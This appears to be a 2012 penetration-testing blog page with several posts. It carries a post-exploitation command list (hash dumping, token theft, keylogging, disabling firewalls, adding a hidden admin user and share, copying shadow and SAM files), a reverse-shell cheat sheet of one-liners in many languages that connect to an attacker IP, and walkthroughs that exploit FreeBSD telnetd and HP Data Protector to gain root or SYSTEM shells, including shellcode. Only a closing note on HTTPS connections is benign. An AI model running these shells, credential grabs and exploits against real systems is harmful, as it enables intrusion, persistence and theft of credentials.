phillips321.co.uk

Post Exploit Commands

Posted by phillips321 on February 7, 2012 No comments

Credit for most of the below comes from Mubix who has created a few documents (on google docs) that lists what to actually do once shell access has been gained. You can read more about it here and find the links to the docs, I’m simply blogging about it to make a summary of this for myself.

Meterpreter Post Auth

Information Gathering

getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

Escalating Privs

ps then migrate
getsystem

Tokens (use incognito)

list_tokens -u
impersonate_token
steal_token [pid]
rev2self

Retrieve Passwords

hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc

Session

enumdesktops
getdesktop
setdesktop
uictl disable keyboard

Keylog

keyscan_start
keyscan_dump
keyscan_stop

Nix Post Auth

Disable Firewall

/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules

Files to pull

/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/groups OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers

User Information

grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*

Windows Post Auth

Add user

net user pentest password /add
net localgroup administrators pentest /add

Add share

net share nothing$=C:\ /grant:pentest,FULL /unlimited

Disable Firewall

netsh firewall set opmode disable

Auto Start Directories

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\wmiOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

Accounts and Policies

net localgroup administrators OR net localgroup administrators /domain
net group “Domain Admins” /domain
net accounts ## or net accounts /domain

Files to pull

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive

Enable Remote Desktop

reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

Should you wish to have all this useful info (as well as an ascii table) then feel free to use the following wallpaper (1920×1200).

Or customize the GIMP XCF file yourself.

Reverse Shell Cheat Sheet

Posted by phillips321 on February 5, 2012 No comments

There are many pages on the web documenting quick reverse shell one liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them but I wanted to recapture what they’ve got for my notes purposes. (It’s easier for me to find stuff if it’s in one place). All credit goes to both of those guys where I got all this info from.

Step one – Set up your listener.

nc -l -v attackerip 4444

In all these examples the attacker IP will be 192.168.0.100

Bash

exec 5<>/dev/tcp/192.168.0.100/4444

cat <&5 | while read line; do $line 2>&5 >&5; done

0<&196;exec 196<>/dev/tcp/192.168.0.100/4444; sh <&196 >&196 2>&196

bash -i >& /dev/tcp/192.168.0.100/4444 0>&1

Perl

perl -e ‘use socket;$i="192.168.0.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

For windows based systems you can use

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

PHP

php -r ‘$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");’

Ruby

ruby -rsocket -e‘f=TCPSocket.open("192.168.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

The following does not need /bin/sh:

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end’

The following is for windows based systems:

ruby -rsocket -e ‘c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end’

NetCat

nc -e /bin/sh 192.168.0.100 4444

nc -c /bin/sh 192.168.0.100 4444

/bin/sh | nc 192.168.0.100 4444

If the -e flag is disabled you can get around it using the following

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

Java

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()

Telnet
If netcat is missing (and in most cases you wont have this), then use telnet:

rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.0.100 4444 0/tmp/p

telnet 192.168.0.100 4444 | /bin/bash | telnet 192.168.0.100 4445

# also listen on your machine also on port 4445/tcp

Xterm
This one is a little more tricky, you need to start a listener on the attacker box to catch the incoming xterm

Xnest :1; xterm -display 127.0.0.1:1

and then inside the spawned xterm session run this:

xhost +victimip

Then on the victim you need to run this

xterm -display 192.168.0.100:1

FreeBSD Derived telnetd service Exploit

Posted by phillips321 on January 18, 2012 No comments

Mentioned by hdm here and here but I wanted to make a note of this myself.
First thing to do is setup the scan to look for vulnerable telnetd services:

msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow

msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24

RHOSTS => 192.168.0.0/24

msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64

THREADS => 64

And now to run the scan

msf  auxiliary(telnet_encrypt_overflow) > run

[*] 192.168.0.1:23 Does not support encryption: Netgear Embedded Telnet Server (c) 2000-2007\x0a\x0aWARNING:  Access allowed by authorized users only.\x0a\x0alogin: \x0aERROR – Your telnet client rejected our request to use char-at-a-time mode!\x0aUnable to operate under this condition.\r\x0a\x0a\x0a\x0aYour telnet session has expired due to inactivity… 

[+] 192.168.0.13:23 VULNERABLE: FreeBSD/i386 () (ttyp0)\x0d\x0a\x0d\x0alogin:

[*] Scanned 026 of 256 hosts (010% complete)

[*] Scanned 053 of 256 hosts (020% complete)

[*] Scanned 087 of 256 hosts (033% complete)

[*] Scanned 105 of 256 hosts (041% complete)

[*] Scanned 132 of 256 hosts (051% complete)

[*] Scanned 196 of 256 hosts (076% complete)

[*] Scanned 213 of 256 hosts (083% complete)

[*] Scanned 224 of 256 hosts (087% complete)

[*] Scanned 235 of 256 hosts (091% complete)

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed

msf  auxiliary(telnet_encrypt_overflow) >

Looks like 192.168.0.13 is vulnerable, what a surprise.
The exploit we need to use here is exploit/freebsd/telnet/telnet_encrypt_keyid:

msf  exploit(telnet_encrypt_keyid)> info
       Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow

     Module: exploit/freebsd/telnet/telnet_encrypt_keyid

    Version: 0

   Platform: BSD

 Privileged: Yes

    License: Metasploit Framework License (BSD)

       Rank: Great
Provided by:

  Jaime Penalba Estebanez <jpenalbae@gmail.com>

  Brandon Perry <bperry.volatile@gmail.com>

  Dan Rosenberg

  hdm <hdm@metasploit.com>
Available targets:

  Id  Name

  –  —-

  0   Automatic

  1   FreeBSD 8.2

  2   FreeBSD 8.1

  3   FreeBSD 8.0

  4   FreeBSD 7.3/7.4

  5   FreeBSD 7.0/7.1/7.2

  6   FreeBSD 6.3/6.4

  7   FreeBSD 6.0/6.1/6.2

  8   FreeBSD 5.5

  9   FreeBSD 5.3
Basic options:

  Name      Current Setting  Required  Description

  —-      —————  ——–  ———–

  PASSWORD                   no        The password for the specified username

  RHOST                      yes       The target address

  RPORT     23               yes       The target port

  USERNAME                   no        The username to authenticate as
Payload information:

  Space: 128

  Avoid: 1 characters
Description:

  This module exploits a buffer overflow in the encryption option 

  handler of the FreeBSD telnet service.
References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-4862

  http://www.osvdb.org/78020

  http://www.securityfocus.com/bid/51182

  http://www.exploit-db.com/exploits/18280/
msf  exploit(telnet_encrypt_keyid) >

The payload is limited to 128 characters so we only have a few options, shell is more than enough though!

msf  exploit(telnet_encrypt_keyid)> show payloads
Compatible Payloads

===================
   Name                        Disclosure Date  Rank    Description

   —-                        —————  —-    ———–

   bsd/x86/exec                                 normal  BSD Execute Command

   bsd/x86/metsvc_bind_tcp                      normal  FreeBSD Meterpreter Service, Bind TCP

   bsd/x86/metsvc_reverse_tcp                   normal  FreeBSD Meterpreter Service, Reverse TCP Inline

   bsd/x86/shell/bind_tcp                       normal  BSD Command Shell, Bind TCP Stager

   bsd/x86/shell/reverse_tcp                    normal  BSD Command Shell, Reverse TCP Stager

   bsd/x86/shell_bind_tcp                       normal  BSD Command Shell, Bind TCP Inline

   bsd/x86/shell_reverse_tcp                    normal  BSD Command Shell, Reverse TCP Inline

   generic/custom                               normal  Custom Payload

   generic/debug_trap                           normal  Generic x86 Debug Trap

   generic/shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline

   generic/shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline

   generic/tight_loop                           normal  Generic x86 Tight Loop

We’ll select bsd/x86/shell/bind_tcp to make things quick.

msf  exploit(telnet_encrypt_keyid) > set payload bsd/x86/shell/bind_tcp

payload => bsd/x86/shell/bind_tcp

msf  exploit(telnet_encrypt_keyid) > set rhost 192.168.0.13

rhost => 192.168.0.13

And now to exploit, note that it trys against all versions of FreeBSD from 5.5 to 8.2

msf  exploit(telnet_encrypt_keyid)> exploit -j
[*] Exploit running as background job.
[*] Brute forcing with 9 possible targets

[*] Trying target FreeBSD 8.2…

[*] Started bind handler

msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload

[*] Sending second payload…

[*] Trying target FreeBSD 8.1…

[*] Sending first payload

[*] Sending second payload…

[*] Trying target FreeBSD 8.0…

[*] Sending first payload

[*] Sending second payload…

[*] Trying target FreeBSD 7.3/7.4…

[*] Sending first payload

[*] Sending second payload…

[*] Trying target FreeBSD 7.0/7.1/7.2…

[*] Sending first payload

[*] Sending second payload…

[*] Trying target FreeBSD 6.3/6.4…

[*] Sending first payload

[*] Sending second payload…

[*] Trying target FreeBSD 6.0/6.1/6.2…

[*] Sending first payload

[*] Sending second payload…

[*] Trying target FreeBSD 5.5…

[*] Sending stage (46 bytes) to 192.168.0.13

[*] Sending first payload

[*] Command shell session 1 opened (192.168.0.8:41452 -> 192.168.0.13:4444) at 2012-01-18 11:01:05 -0500

[*] Sending second payload…

Looks like we got shell

msf  exploit(telnet_encrypt_keyid)> sessions -i 1
[*] Starting interaction with 1…
whoami

root

To be more stealthy you could set the exploit code to the specific version of FreeBSD you’re targeting:

Available targets:

  Id  Name

  –  —-

  0   Automatic

  1   FreeBSD 8.2

  2   FreeBSD 8.1

  3   FreeBSD 8.0

  4   FreeBSD 7.3/7.4

  5   FreeBSD 7.0/7.1/7.2

  6   FreeBSD 6.3/6.4

  7   FreeBSD 6.0/6.1/6.2

  8   FreeBSD 5.5

  9   FreeBSD 5.3

msf  exploit(telnet_encrypt_keyid)>set target 7

target => 7

msf  exploit(telnet_encrypt_keyid)> exploit -j
[*] Exploit running as background job.
[*] Started bind handler

msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload

[*] Sending second payload…

[*] Sending stage (46 bytes) to 192.168.0.13

[*] Command shell session 2 opened (192.168.0.8:48865 -> 192.168.0.13:4444) at 2012-01-18 11:03:55 -0500

sessions -l
Active sessions

===============
  Id  Type       Information  Connection

  –  —-       ———–  ———-

  2   shell bsd               192.168.0.8:48865 -> 192.168.0.13:4444

HP Data Protector <6.20 vulnerability

Posted by phillips321 on January 18, 2012 No comments

Ok so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service(all of the output below is from my own testbed, hence the local 192.168.x.x IPs):

root@bt:~# nc 192.168.0.18 5555

break

HP Data Protector A.06.11: INET, internal build 243, built on 25 August 2009, 13:08

root@bt:~#

This version is flagged as vulnerable as per this HP Security Bulletin. A little digging with exploitdb found the following exploits:

root@bt:~# /pentest/exploits/exploitdb/searchsploit protector

 Description                                                                 Path

————————————————————————— ————————-

HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit             /windows/dos/9006.py

HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos (meta)              /windows/dos/9007.rb

HP Data Protector Media Operations 6.11 Multiple Modules NULL Pointer Dereference DoS /windows/dos/14974.txt

HP Data Protector Media Operations NULL Pointer Dereference Remote DoS      /win32/dos/15214.py

HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS /windows/dos/15307.py

HP Data Protector Manager A.06.11 MMD NULL Pointer Dereference Denial of Service /windows/dos/15649.pl

HP Data Protector Manager v6.11 Remote DoS in RDS Service                   /windows/dos/15940.pl

HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)    /windows/remote/17339.py

HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)  /windows/remote/17345.py

HP Data Protector 6.20 Multiple Vulnerabilities                             /windows/dos/17458.txt

HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability               /windows/dos/17461.txt

HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass                  /windows/remote/17468.py

HP Data Protector Remote Shell for HP-UX                                    /hp-ux/remote/17614.sh

HP Data Protector Remote Root Shell for Linux                               /linux/remote/17648.sh

HP Data Protector Media Operations <= 6.20 Directory Traversal              /windows/webapps/18077.txt

root@bt:~#

Of interest are these 2:

HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055) /windows/remote/17339.py
HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056) /windows/remote/17345.py

As I dont have time to edit the shellcode in the second example we’ll just play with the first for now.
The first just runs a command and replays the output to the terminal, the second attempts to download and run the command.
The exploit is as simple as just pointing it to the target and executing:

root@bt:~# python 17339.py 192.168.0.18 5555

Sending payload

[70:18] 

[70:18] Windows IP Configuration

[70:18] 

[70:18] 

[70:18] Ethernet adapter INTERNAL_LAN:

[70:18]    Connection-specific DNS Suffix  . : 

[70:18]    IP Address. . . . . . . . . . . . : 192.168.100.1

[70:18]    Default Gateway . . . . . . . . . : 192.168.100.1

[70:18] Ethernet adapter Bridged:

[70:18]    Connection-specific DNS Suffix  . : 

[70:18]    IP Address. . . . . . . . . . . . : 192.168.0.18

[70:18]    Subnet Mask . . . . . . . . . . . : 255.255.255.0

[70:18]    Default Gateway . . . . . . . . . : 192.168.0.1

root@bt:~#

A quick look at the shellcode looks like it attempts to run as SYSTEM:

\x00\x00\x00\xa4\x20\x32\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x43\x00\x20\x32\x30\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x69\x70\x63\x6f\x6e\x66\x69\x67\x2e\x65\x78\x65\x00\x00

Translates into:

¤ 2 fdiskyou 0 SYSTEM fdiskyou C 20 fdiskyou Poc NTAUTHORITY NTAUTHORITY NTAUTHORITY 0 0 ../../../../../../../../../../\windows\system32\ipconfig.exe

One thing to note is that this will not work on a Win2K box unless you replace /windows/ with /WINNT/. I quickly edited the shellcode to run the whoami.exe command instead to confirm the useraccount we have exploited:

root@bt:~# python 17339.py 192.168.0.18 5555

Sending payload

[70:18] nt authority\system

root@bt:~#

Sweet so it works.
Afterword, although there is an exploit in metasploit that supposedly works it isnt designed for windows targets and to get it to work you have to bodge it and it still only sends 4 characters, pointless:

msf  exploit(openview_omniback_exec)> info
       Name: HP OpenView OmniBack II Command Execution

     Module: exploit/multi/misc/openview_omniback_exec

SNIP

Description:

  This module uses a vulnerability in the OpenView Omniback II service 

  to execute arbitrary commands. This vulnerability was discovered by 

  DiGiT and his code was used as the basis for this module. For 

  Microsoft Windows targets, due to module limitations, use the 

  "unix/cmd/generic" payload and set CMD to your command. You can only 

  pass a small amount of characters (4) to the command line on 

  Windows.

Connecting to HTTPS services from the terminal

Posted by phillips321 on January 17, 2012 No comments

A little brain issue prevented me from remembering how to connect to a HTTPS service on the command line. NetCat doesnt seems to work, it just hangs.
Fortunately after wasting sometime i recalled how to do it in not one but 2 ways:
Option 1 : ncat (part of the nmap tool kit)

root@bt:~# ncat –ssl www.phillips321.co.uk 443

OPTIONS / HTTP/1.1

Host:www.phillips321.co.uk
HTTP/1.1 200 OK

Date: Tue, 17 Jan 2012 15:24:24 GMT

Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0d PHP/5.3.6

X-Powered-By: PHP/5.3.6

Vary: Accept-Encoding,Cookie

Cache-Control: max-age=3, must-revalidate

WP-Super-Cache: Served supercache file from PHP

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8

Option 2 : openssl (part of the openssl tools)

openssl s_client -connect www.phillips321.co.uk:443

Be warned though, using the openssl was will echo out all the certificate details….

pen testing, security and linux